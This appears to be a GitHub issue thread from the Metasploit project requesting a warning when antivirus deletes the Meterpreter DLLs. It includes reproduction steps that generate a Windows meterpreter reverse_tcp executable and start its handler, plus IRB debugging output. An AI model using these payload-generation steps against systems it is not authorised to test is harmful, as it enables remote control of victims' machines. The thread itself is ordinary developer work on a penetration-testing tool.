Add error message if Meterpreter DLLs are missing

adfoster-r7 commented 2 years ago

Summary

When Antivirus deletes the Meterpreter DLLs, there's no clear indication that something has gone wrong. We could improve this by:

Adding additional warning messages on msfconsole boot, potentially as part of the eicar check on bootup
Add additional logic to capture the scenario of generating a staged payload which isn't successfully opening a shell as the required Meterpreter DLLS are missing.

Generate payload:

use windows/x64/meterpreter/reverse_tcp
set lhost 192.168.123.159 
generate -f exe -o shell.exe

Move the DLLS:

## Find where your DLLs are currently:
msf6 payload(windows/x64/meterpreter/reverse_tcp) > bundle show metasploit-payloads
[*] exec: bundle show metasploit-payloads
/Users/user/.rvm/gems/ruby-3.0.5@metasploit-framework/gems/metasploit-payloads-2.0.148

## Temporarily move them!
cd /opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/metasploit-payloads-2.0.148/data
sudo mv meterpreter/ removed_by_av_meterpreter/

Verifying nil path in msfconsole:

msf6 payload(windows/x64/meterpreter/reverse_tcp) > irb
[*] Starting IRB shell...
[*] You are in payload/windows/x64/meterpreter/reverse_tcp

>>  MetasploitPayloads.meterpreter_path('metsrv', 'x86.dll', debug: false)
=> nil

Now trigger the payload on the windows target

Currrent behavior

The prompt does not indicate any failure has occurred:

msf6 payload(windows/x64/meterpreter/reverse_tcp) > to_handler
[*] Payload Handler Started as Job 1

Expected behavior

Expected behavior:

msf6 payload(windows/x64/meterpreter/reverse_tcp) > to_handler
[*] Payload Handler Started as Job 1
[!] Meterpreter path metsrv.x86.dll not found. Ensure antivirus is not enabled, or reinstall Metasploit.

Motivation

Allow users to more clearly understand when their A/V is interrupting msfconsole usage

Debugging

Not sure where the code is being called from, but you should be able to put in a breakpoint and use puts caller or up and down inside an interactive pry breakpoint to work out what's what

msf6 payload(windows/x64/meterpreter/reverse_tcp) > irb
[*] Starting IRB shell...
[*] You are in payload/windows/x64/meterpreter/reverse_tcp

>> MetasploitPayloads.method(:meterpreter_path)
=> #<Method: MetasploitPayloads.meterpreter_path(name, binary_suffix, debug: ...) /Users/user/.rvm/gems/ruby-3.0.5@metasploit-framework/gems/metasploit-payloads-2.0.148/lib/metasploit-payloads.rb:40>

smcintyre-r7 commented 2 years ago

Kind of unrealted but we have something similar to this here where the EICAR string is used as a canary to see if the files have been tampered with.

https://github.com/rapid7/metasploit-framework/blob/42c94fee8103394a4ab33f54cb354858422cc6aa/lib/msf/core/framework.rb#L243

adfoster-r7 commented 12 months ago

Closed by https://github.com/rapid7/metasploit-payloads/pull/673

rapid7 / metasploit-framework